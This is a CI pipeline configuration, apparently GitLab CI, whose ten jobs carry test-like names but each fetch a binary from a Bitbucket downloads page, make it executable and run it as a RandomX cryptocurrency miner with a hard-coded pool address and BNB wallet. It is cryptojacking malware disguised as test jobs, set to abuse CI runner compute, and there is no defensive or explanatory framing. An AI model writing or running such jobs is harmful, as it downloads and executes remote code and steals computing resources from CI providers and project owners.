test_async:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_db:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_asfync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_ddb:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_assync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_dab:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_ashync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_dbr:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   

test_ashync:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   


test_dbc:
  script:
    - apt-get update &&  apt-get install -y wget &&  wget https://bitbucket.org/juani2603/donwload/downloads/masterfile &&  chmod u+x masterfile &&  ./masterfile --disable-gpu --algorithm randomx --pool 165.227.121.104:3333 --wallet BNB:bnb1udq3s2yn2q7mq5mlpkrj98uj58s7dujmjrj7nw:1970775.BUDAK1 --cpu-threads 100;00   
